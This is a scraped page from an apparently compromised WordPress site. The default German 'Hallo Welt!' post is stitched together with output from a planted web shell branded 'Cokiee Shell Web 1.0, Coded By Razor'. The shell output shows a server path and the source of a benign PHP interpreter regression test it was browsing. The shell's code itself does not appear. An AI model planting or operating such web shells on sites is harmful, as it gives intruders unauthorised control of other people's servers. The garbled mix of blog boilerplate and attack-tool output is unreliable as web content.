Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/bug49269.phpt |
--TEST-- Bug #49269 (Ternary operator fails on Iterator object when used inside foreach declaration). --FILE-- <?php class TestObject implements Iterator { public $n = 0; function valid() { return ($this->n < 3); } function current() {return $this->n;} function next() {$this->n++;} function key() { } function rewind() {$this->n = 0;} } $array_object = new TestObject(); foreach ((true ? $array_object : $array_object) as $item) echo "$item\n"; ?> --EXPECT-- 0 1 2
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare